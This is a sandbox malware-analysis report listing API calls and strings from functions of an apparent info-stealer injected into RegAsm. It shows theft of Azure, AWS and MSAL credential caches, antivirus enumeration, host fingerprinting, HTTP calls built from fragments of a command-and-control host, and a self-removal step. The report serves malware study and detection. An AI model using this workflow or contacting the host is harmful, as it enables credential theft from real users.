Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28

Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

_memset.LIBCMT ref: 00416556
lstrcatA.KERNEL32(?,00000000), ref: 00416578
lstrcatA.KERNEL32(?,\.aws\), ref: 00416595

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

_memset.LIBCMT ref: 004165CA
lstrcatA.KERNEL32(?,00000000), ref: 004165EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
_memset.LIBCMT ref: 0041663E

Strings

\.azure\, xrefs: 00416512
Azure\.azure, xrefs: 00416531
Azure\.aws, xrefs: 004165A5
\.IdentityService\, xrefs: 004165FD
msal.cache, xrefs: 0041661E
*.*, xrefs: 00416536
\.aws\, xrefs: 00416589
*.*, xrefs: 004165AA
Azure\.IdentityService, xrefs: 00416619

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4216275855-974132213
Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417A9A

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00418000

Strings

http://, xrefs: 00417E57
hopto, xrefs: 00417E9F
4b74261d834413e886f920a1e9dc5b33, xrefs: 0041770C
_DEBUG.zip, xrefs: 00417F35
cowod., xrefs: 00417E7B
org, xrefs: 00417EE7
.exe, xrefs: 00417E04
.exe, xrefs: 00417549

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$4b74261d834413e886f920a1e9dc5b33$_DEBUG.zip$cowod.$hopto$http://$org
API String ID: 305159127-1107223390
Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

false, xrefs: 004136C5
true, xrefs: 004136A6

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

GET, xrefs: 00405325
\xA, xrefs: 00405250, 00405457, 0040539E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$\xA
API String ID: 442264750-571280152
Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

root\SecurityCenter2, xrefs: 004119F0
Unknown, xrefs: 00411AA0
Select * From AntiVirusProduct, xrefs: 00411A23
Unknown, xrefs: 00411AB4
displayName, xrefs: 00411A6F
Unknown, xrefs: 00411A99
WQL, xrefs: 00411A28

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
String ID:
API String ID: 2891980384-0
Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98

Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418296
_memset.LIBCMT ref: 004182A5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 00418456
_memset.LIBCMT ref: 00418465
_memset.LIBCMT ref: 00418477
ExitProcess.KERNEL32 ref: 00418487

